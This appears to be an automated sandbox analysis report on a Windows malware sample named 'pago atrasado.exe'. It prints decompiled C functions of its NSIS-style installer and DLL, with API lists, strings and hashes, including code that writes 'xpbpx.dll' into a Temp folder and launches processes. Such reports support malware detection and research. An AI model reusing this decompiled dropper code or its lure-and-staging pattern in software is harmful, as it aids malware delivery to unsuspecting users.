                                            						_t32 =  *((intOrPtr*)(_t54 + 4)) + 2 -  *((intOrPtr*)(_t76 + 8)) < 0;
                                            						__eflags = _t32;
                                            						_v14 = _t82 & 0xffffff00 | _t32;
                                            					}
                                            					_t50 = _v14;
                                            					__eflags = _t50 & 0x00000001;
                                            					if((_t50 & 0x00000001) == 0) {
                                            						break;
                                            					}
                                            					 *_t90 = _a4;
                                            					_v20 = E10004020() & 0x0000ffff;
                                            					_v8 = _v20 << _v12 | _v8;
                                            					_t82 = _v12 + 0x10;
                                            					_v12 = _t82;
                                            				}
                                            				return _v8;
                                            			}

                                            APIs
                                            • __wassert.LIBCMT ref: 10004189
                                              • Part of subcall function 10005287: GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000534C
                                              • Part of subcall function 10005287: GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 10005378
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Module$FileHandleName__wassert
                                            • String ID: $(dec->bit_pos & 0xF) == 0$Source.c
                                            • API String ID: 1832359313-2493867184
                                            • Opcode ID: cef82a7ac4badff057b50e5a51ff0f5bf28fb44a8569e50c435aa979c4707036
                                            • Instruction ID: 3d9d7b110c4f8f0c8c02d5fef138159b8475e2a573a6972cdbb6502390cc2c17
                                            • Opcode Fuzzy Hash: cef82a7ac4badff057b50e5a51ff0f5bf28fb44a8569e50c435aa979c4707036
                                            • Instruction Fuzzy Hash: 45313C74A04248EFDB04DF98C090A9DBBF1EF58380F25849DE8859B346D731EA85DB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 51%
                                            			E00401BCA() {
                                            				signed int _t28;
                                            				CHAR* _t31;
                                            				long _t32;
                                            				int _t37;
                                            				signed int _t38;
                                            				int _t42;
                                            				int _t48;
                                            				struct HWND__* _t52;
                                            				void* _t55;
                                            
                                            				 *(_t55 - 8) = E00402A0C(3);
                                            				 *(_t55 + 8) = E00402A0C(4);
                                            				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
                                            					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
                                            				}
                                            				__eflags =  *(_t55 - 0x14) & 0x00000002;
                                            				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
                                            					 *(_t55 + 8) = E00402A29(0x44);
                                            				}
                                            				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
                                            				_push(1);
                                            				if(__eflags != 0) {
                                            					_t50 = E00402A29();
                                            					_t28 = E00402A29();
                                            					asm("sbb ecx, ecx");
                                            					asm("sbb eax, eax");
                                            					_t31 =  ~( *_t27) & _t50;
                                            					__eflags = _t31;
                                            					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                            					goto L10;
                                            				} else {
                                            					_t52 = E00402A0C();
                                            					_t37 = E00402A0C();
                                            					_t48 =  *(_t55 - 0x14) >> 2;
                                            					if(__eflags == 0) {
                                            						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
                                            						L10:
                                            						 *(_t55 - 0xc) = _t32;
                                            					} else {
                                            						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
                                            						asm("sbb eax, eax");
                                            						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                            					}
                                            				}
                                            				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
                                            				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
                                            					_push( *(_t55 - 0xc));
                                            					E00405AF6();
                                            				}
                                            				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t55 - 4));
                                            				return 0;
                                            			}

                                            APIs
                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                            • SendMessageA.USER32 ref: 00401C42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                            • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                                            • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                            • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004038B4(void* __ecx, void* __eflags) {
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed short _t6;
                                            				intOrPtr _t11;
                                            				signed int _t13;
                                            				intOrPtr _t15;
                                            				signed int _t16;
                                            				signed short* _t18;
                                            				signed int _t20;
                                            				signed short* _t23;
                                            				intOrPtr _t25;
                                            				signed int _t26;
                                            				intOrPtr* _t27;
                                            
                                            				_t24 = "1033";
                                            				_t13 = 0xffff;
                                            				_t6 = E00405B0F(__ecx, "1033");
                                            				while(1) {
                                            					_t26 =  *0x423f84; // 0x1
                                            					if(_t26 == 0) {
                                            						goto L7;
                                            					}
                                            					_t15 =  *0x423f50; // 0x661638
                                            					_t16 =  *(_t15 + 0x64);
                                            					_t20 =  ~_t16;
                                            					_t18 = _t16 * _t26 +  *0x423f80;
                                            					while(1) {
                                            						_t18 = _t18 + _t20;
                                            						_t26 = _t26 - 1;
                                            						if((( *_t18 ^ _t6) & _t13) == 0) {
                                            							break;
                                            						}
                                            						if(_t26 != 0) {
                                            							continue;
                                            						}
                                            						goto L7;
                                            					}
                                            					 *0x423720 = _t18[1];
                                            					 *0x423fe8 = _t18[3];
                                            					_t23 =  &(_t18[5]);
                                            					if(_t23 != 0) {
                                            						 *0x42371c = _t23;
                                            						E00405AF6(_t24,  *_t18 & 0x0000ffff);
                                            						SetWindowTextA( *0x420510, E00405BBA(_t13, _t24, _t26, "cuflzcqvvfgho Setup", 0xfffffffe));
                                            						_t11 =  *0x423f6c; // 0x2
                                            						_t27 =  *0x423f68; // 0x6617e4
                                            						if(_t11 == 0) {
                                            							L15:
                                            							return _t11;
                                            						}
                                            						_t25 = _t11;
                                            						do {
                                            							_t11 =  *_t27;
                                            							if(_t11 != 0) {
                                            								_t5 = _t27 + 0x18; // 0x6617fc
                                            								_t11 = E00405BBA(_t13, _t25, _t27, _t5, _t11);
                                            							}
                                            							_t27 = _t27 + 0x418;
                                            							_t25 = _t25 - 1;
                                            						} while (_t25 != 0);
                                            						goto L15;
                                            					}
                                            					L7:
                                            					if(_t13 != 0xffff) {
                                            						_t13 = 0;
                                            					} else {
                                            						_t13 = 0x3ff;
                                            					}
                                            				}
                                            			}

                                            APIs
                                            • SetWindowTextA.USER32(00000000,cuflzcqvvfgho Setup), ref: 0040394C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: TextWindow
                                            • String ID: "C:\Users\user\Desktop\pago atrasado.exe" $1033$cuflzcqvvfgho Setup
                                            • API String ID: 530164218-3358065705
                                            • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                            • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                                            • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                            • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 16%
                                            			E10008661(void* __ecx, intOrPtr _a4) {
                                            				struct HINSTANCE__* _v8;
                                            				_Unknown_base(*)()* _t4;
                                            
                                            				_t4 =  &_v8;
                                            				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
                                            				if(_t4 != 0) {
                                            					_t4 = GetProcAddress(_v8, "CorExitProcess");
                                            					if(_t4 != 0) {
                                            						return  *_t4(_a4);
                                            					}
                                            				}
                                            				return _t4;
                                            			}






                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,10003D2C,?,?,10008656,?,?,10009F7C,000000FF,0000001E,10019110,00000008,10009F1F,?,?), ref: 10008670
                                            • GetProcAddress.KERNEL32(10003D2C,CorExitProcess), ref: 10008682
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 1646373207-1276376045
                                            • Opcode ID: 2a63a422e3baeebc4f5ac8df4388500ef977183468ba79ff03e06e1ce2fb8bf3
                                            • Instruction ID: 4c5b83ef195b6caa5ad471cbb6109c0cad75af4c1780a450109e40989b8f11ea
                                            • Opcode Fuzzy Hash: 2a63a422e3baeebc4f5ac8df4388500ef977183468ba79ff03e06e1ce2fb8bf3
                                            • Instruction Fuzzy Hash: B6D01730600209BBEF41DBA5CC85BA97AACEB05681F514165FA8CE60A0DB32DB60D7A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040568B(CHAR* _a4) {
                                            				CHAR* _t7;
                                            
                                            				_t7 = _a4;
                                            				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                            					lstrcatA(_t7, 0x409010);
                                            				}
                                            				return _t7;
                                            			}





                                            APIs
                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 0040569A
                                            • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-823278215
                                            • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                            • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                                            • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                            • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E1000E2BE(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                            				char _v8;
                                            				intOrPtr _v12;
                                            				int _v20;
                                            				void* __ebx;
                                            				int _t35;
                                            				int _t38;
                                            				intOrPtr* _t44;
                                            				int _t47;
                                            				short* _t49;
                                            				intOrPtr _t50;
                                            				intOrPtr _t54;
                                            				int _t55;
                                            				int _t59;
                                            				char* _t62;
                                            
                                            				_t62 = _a8;
                                            				if(_t62 == 0) {
                                            					L5:
                                            					return 0;
                                            				}
                                            				_t50 = _a12;
                                            				if(_t50 == 0) {
                                            					goto L5;
                                            				}
                                            				if( *_t62 != 0) {
                                            					E1000A910(_t50,  &_v20, _a16);
                                            					_t35 = _v20;
                                            					__eflags =  *(_t35 + 0xa8);
                                            					if( *(_t35 + 0xa8) != 0) {
                                            						_t38 = E1000E0FD( *_t62 & 0x000000ff,  &_v20);
                                            						__eflags = _t38;
                                            						if(_t38 == 0) {
                                            							__eflags = _a4;
                                            							_t59 = 1;
                                            							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                            							if(__eflags != 0) {
                                            								L21:
                                            								__eflags = _v8;
                                            								if(_v8 != 0) {
                                            									_t54 = _v12;
                                            									_t31 = _t54 + 0x70;
                                            									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                            									__eflags =  *_t31;
                                            								}
                                            								return _t59;
                                            							}
                                            							L20:
                                            							_t44 = E1000982A(__eflags);
                                            							_t59 = _t59 | 0xffffffff;
                                            							__eflags = _t59;
                                            							 *_t44 = 0x2a;
                                            							goto L21;
                                            						}
                                            						_t59 = _v20;
                                            						__eflags =  *(_t59 + 0x74) - 1;
                                            						if( *(_t59 + 0x74) <= 1) {
                                            							L15:
                                            							__eflags = _t50 -  *(_t59 + 0x74);
                                            							L16:
                                            							if(__eflags < 0) {
                                            								goto L20;
                                            							}
                                            							__eflags = _t62[1];
                                            							if(__eflags == 0) {
                                            								goto L20;
                                            							}
                                            							L18:
                                            							_t59 =  *(_t59 + 0x74);
                                            							goto L21;
                                            						}
                                            						__eflags = _t50 -  *(_t59 + 0x74);
                                            						if(__eflags < 0) {
                                            							goto L16;
                                            						}
                                            						__eflags = _a4;
                                            						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                            						_t59 = _v20;
                                            						__eflags = _t47;
                                            						if(_t47 != 0) {
                                            							goto L18;
                                            						}
                                            						goto L15;
                                            					}
                                            					_t55 = _a4;
                                            					__eflags = _t55;
                                            					if(_t55 != 0) {
                                            						 *_t55 =  *_t62 & 0x000000ff;
                                            					}
                                            					_t59 = 1;
                                            					goto L21;
                                            				}
                                            				_t49 = _a4;
                                            				if(_t49 != 0) {
                                            					 *_t49 = 0;
                                            				}
                                            				goto L5;
                                            			}


















                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000E2F4
                                            • __isleadbyte_l.LIBCMT ref: 1000E322
                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,00000000,00000000,?,000000AA), ref: 1000E350
                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,000000AA), ref: 1000E386
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                            • String ID:
                                            • API String ID: 3058430110-0
                                            • Opcode ID: 6f5cf4a664c4f3da983ed589d2be9ce1675f9597b158876f89940561b3aa0206
                                            • Instruction ID: 0efa3307e89526d24c36fe6befebac151ad836a38563cbc267903785e4c6cef8
                                            • Opcode Fuzzy Hash: 6f5cf4a664c4f3da983ed589d2be9ce1675f9597b158876f89940561b3aa0206
                                            • Instruction Fuzzy Hash: 3231A031600296ABEB11CF75C848BAE7FE9FF41390F128569F864A7195D730EE90DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E1001064B(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                            				intOrPtr _t25;
                                            				void* _t26;
                                            
                                            				_t25 = _a16;
                                            				if(_t25 == 0x65 || _t25 == 0x45) {
                                            					_t26 = E100109D4(_a4, _a8, _a12, _a20, _a24, _a28);
                                            					goto L9;
                                            				} else {
                                            					if(_t25 != 0x66) {
                                            						if(_t25 == 0x61 || _t25 == 0x41) {
                                            							_t26 = E10010AA2(_a4, _a8, _a12, _a20, _a24, _a28);
                                            						} else {
                                            							_t26 = E10010FAB(__edx, __esi, _a4, _a8, _a12, _a20, _a24, _a28);
                                            						}
                                            						L9:
                                            						return _t26;
                                            					} else {
                                            						return E10010EEA(__edx, __esi, _a4, _a8, _a12, _a20, _a28);
                                            					}
                                            				}
                                            			}






                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                            • String ID:
                                            • API String ID: 3016257755-0
                                            • Opcode ID: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                                            • Instruction ID: 637b46fedc376a00ebdecaeb4e55fad8fb1b906e7e8e5ece0182e652d1955ce7
                                            • Opcode Fuzzy Hash: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                                            • Instruction Fuzzy Hash: 4301407660014EBBCF12DE84CC418EE3F62FF48294B548415FE9859031D276D9B1AB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 67%
                                            			E00401D38() {
                                            				void* __esi;
                                            				int _t6;
                                            				signed char _t11;
                                            				struct HFONT__* _t14;
                                            				void* _t18;
                                            				void* _t24;
                                            				void* _t26;
                                            				void* _t28;
                                            
                                            				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                                            				0x40b014->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
                                            				 *0x40b024 = E00402A0C(3);
                                            				_t11 =  *((intOrPtr*)(_t28 - 0x18));
                                            				 *0x40b02b = 1;
                                            				 *0x40b028 = _t11 & 0x00000001;
                                            				 *0x40b029 = _t11 & 0x00000002;
                                            				 *0x40b02a = _t11 & 0x00000004;
                                            				E00405BBA(_t18, _t24, _t26, 0x40b030,  *((intOrPtr*)(_t28 - 0x24)));
                                            				_t14 = CreateFontIndirectA(0x40b014);
                                            				_push(_t14);
                                            				_push(_t26);
                                            				E00405AF6();
                                            				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t28 - 4));
                                            				return 0;
                                            			}












                                            APIs
                                            • GetDC.USER32(?), ref: 00401D3F
                                            • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                            • CreateFontIndirectA.GDI32(0040B014), ref: 00401DA7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirect
                                            • String ID:
                                            • API String ID: 3272661963-0
                                            • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                            • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                                            • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                            • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00402BF1(intOrPtr _a4) {
                                            				long _t2;
                                            				struct HWND__* _t3;
                                            				struct HWND__* _t6;
                                            
                                            				if(_a4 == 0) {
                                            					__eflags =  *0x4170e0; // 0x0
                                            					if(__eflags == 0) {
                                            						_t2 = GetTickCount();
                                            						__eflags = _t2 -  *0x423f4c;
                                            						if(_t2 >  *0x423f4c) {
                                            							_t3 = CreateDialogParamA( *0x423f40, 0x6f, 0, E00402B6E, 0);
                                            							 *0x4170e0 = _t3;
                                            							return ShowWindow(_t3, 5);
                                            						}
                                            						return _t2;
                                            					} else {
                                            						return E00405F64(0);
                                            					}
                                            				} else {
                                            					_t6 =  *0x4170e0; // 0x0
                                            					if(_t6 != 0) {
                                            						_t6 = DestroyWindow(_t6);
                                            					}
                                            					 *0x4170e0 = 0;
                                            					return _t6;
                                            				}
                                            			}







                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                            • GetTickCount.KERNEL32 ref: 00402C22
                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                            • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00404DD4(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                            				long _t22;
                                            
                                            				if(_a8 != 0x102) {
                                            					if(_a8 != 0x200) {
                                            						_t22 = _a16;
                                            						L7:
                                            						if(_a8 == 0x419 &&  *0x420520 != _t22) {
                                            							 *0x420520 = _t22;
                                            							E00405B98(0x420538, 0x425000);
                                            							E00405AF6(0x425000, _t22);
                                            							E0040140B(6);
                                            							E00405B98(0x425000, 0x420538);
                                            						}
                                            						L11:
                                            						return CallWindowProcA( *0x420528, _a4, _a8, _a12, _t22);
                                            					}
                                            					if(IsWindowVisible(_a4) == 0) {
                                            						L10:
                                            						_t22 = _a16;
                                            						goto L11;
                                            					}
                                            					_t22 = E00404753(_a4, 1);
                                            					_a8 = 0x419;
                                            					goto L7;
                                            				}
                                            				if(_a12 != 0x20) {
                                            					goto L10;
                                            				}
                                            				E00403EA0(0x413);
                                            				return 0;
                                            			}





                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00404E0A
                                            • CallWindowProcA.USER32 ref: 00404E78
                                              • Part of subcall function 00403EA0: SendMessageA.USER32 ref: 00403EB2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                            				int _t5;
                                            				long _t7;
                                            				struct _OVERLAPPED* _t11;
                                            				intOrPtr* _t15;
                                            				void* _t17;
                                            				int _t21;
                                            
                                            				_t15 = __esi;
                                            				_t11 = __ebx;
                                            				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
                                            					_t7 = lstrlenA(E00402A29(0x11));
                                            				} else {
                                            					E00402A0C(1);
                                            					 *0x40a010 = __al;
                                            				}
                                            				if( *_t15 == _t11) {
                                            					L8:
                                            					 *((intOrPtr*)(_t17 - 4)) = 1;
                                            				} else {
                                            					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll", _t7, _t17 + 8, _t11);
                                            					_t21 = _t5;
                                            					if(_t21 == 0) {
                                            						goto L8;
                                            					}
                                            				}
                                            				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t17 - 4));
                                            				return 0;
                                            			}










                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll, xrefs: 004024FD, 00402522
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: FileWritelstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll
                                            • API String ID: 427699356-1698642080
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004053F8(CHAR* _a4) {
                                            				struct _PROCESS_INFORMATION _v20;
                                            				int _t7;
                                            
                                            				0x422540->cb = 0x44;
                                            				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422540,  &_v20);
                                            				if(_t7 != 0) {
                                            					CloseHandle(_v20.hThread);
                                            					return _v20.hProcess;
                                            				}
                                            				return _t7;
                                            			}






                                            APIs
                                            Strings
                                            • Error launching installer, xrefs: 0040540B
                                            Memory Dump Source
